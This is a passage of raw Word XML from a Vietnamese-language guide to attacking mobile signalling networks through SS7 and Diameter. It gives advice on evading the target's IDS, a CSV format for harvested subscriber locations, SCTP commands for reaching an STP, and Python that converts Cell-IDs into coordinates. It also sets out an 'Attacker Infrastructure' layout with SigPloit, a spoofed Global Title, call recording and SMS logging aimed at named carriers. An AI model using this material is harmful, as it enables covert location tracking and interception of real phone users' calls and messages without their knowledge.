        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Rate limiting để tránh trigger IDS của mạng đích</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cấu trúc output (CSV):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MSISDN,IMSI,MCC,MNC,LAC,CellID,Lat,Long,Country,Network,Timestamp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+84901234567,452040xxx,452,04,3421,12345,10.775,106.697,VN,Viettel,2026-06-08T10:30:00</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="sctpm3ua-stack-linux"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.7.3 SCTP/M3UA Stack (Linux)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cài đặt SCTP kernel module</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> modprobe sctp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install lksctp-tools</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Kiểm tra kết nối SCTP đến STP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sctp_test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0.0.0.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.0.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2905 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-s</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Wireshark filter cho SS7 traffic</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># m3ua || sccp || tcap || gsm_map</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="27" w:name="opengts-cellid-lookup"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.7.4 OpenGTS / CelliD Lookup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau khi thu thập Cell-ID từ PSI response, ánh xạ sang tọa độ:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cell_to_coords(mcc, mnc, lac, cell_id):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""Tra cứu tọa độ từ Cell-ID qua OpenCelliD API"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    url </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"https://opencellid.org/cell/get"</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"key"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"API_KEY"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mcc"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: mcc, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mnc"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: mnc,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"lac"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: lac, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"cellid"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: cell_id,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"format"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"json"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests.get(url, params</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">params)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> r.json()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"lat"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">), data.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"lon"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">), data.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"range"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Ví dụ</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lat, lon, acc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cell_to_coords(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">452</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3421</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">12345</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"Vị trí: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">°N, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">°E (±</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">acc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">m)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="triển-khai-hệ-thống-đầy-đủ"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8 Triển Khai Hệ Thống Đầy Đủ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">┌─────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    Attacker Infrastructure                       │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                                                                 │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  ┌─────────────────┐      ┌─────────────────────────────────┐   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │   Attack Server  │      │     SS7 Signalling Gateway      │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │  (Linux/Python)  │      │  (Kamailio + SIGTRAN + pycrate) │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │                  │      │                                 │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │  SigPloit        │◄────►│  M3UA ↔ SCTP ↔ IP              │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │  SS7MAPer        │      │  GT: +49xxxxxxxxxx (spoof)      │   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │  CelliD Lookup   │      └────────────┬────────────────────┘   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │  Audio Recorder  │                   │                        │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │  SMS Logger      │                   │ SCTP (port 2905)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SS7 Global Network │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                               │   (STP / IPX Hub)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HLR/MSC mạng A │   │  HLR/MSC mạng B │   │  SMSC mạng C   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          │  (Viettel, VN)  │   │  (T-Mobile, US)  │   │  (Any carrier)  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          └─────────────────┘   └─────────────────┘   └─────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="43" w:name="diameter-protocol-attack"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Diameter Protocol Attack</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="31" w:name="kiến-trúc-diameter-trong-4glte"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Kiến Trúc Diameter trong 4G/LTE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Diameter (RFC 6733) thay thế SS7 MAP trong mạng 4G nhưng giữ nguyên nhiều đặc điểm kiến trúc của SS7, đặc biệt là mô hình tin cậy liên nhà mạng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Các giao diện Diameter trong EPC:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">┌──────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                      EPC Diameter Interfaces                     │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                                                                  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  MME ──S6a──► HSS        (Authentication, Location Update)       │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  MME ──S13──► EIR        (IMEI check)                            │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  PCRF ──Gx──► P-GW       (Policy, QoS)                          │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  PCRF ──Rx──► P-CSCF     (IMS policy)                           │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  OCS ──Gy──► P-GW        (Online Charging)                      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  PCRF ──S9──► vPCRF      (Roaming policy)                       │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                                                                  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  Kết nối liên nhà mạng:                                         │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  MME ──S6a──► [DEA] ──[IPX/DRA]──► [DEA] ──S6a──► HSS(roaming) │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└──────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="cấu-trúc-message-diameter"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Cấu Trúc Message Diameter</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Version    |                 Message Length                |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| R P E T r r r |              Command Code                     |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|                         Application-ID                        |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|                      Hop-by-Hop Identifier                    |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|                      End-to-End Identifier                    |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|  AVPs (Attribute-Value Pairs) ...                             |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
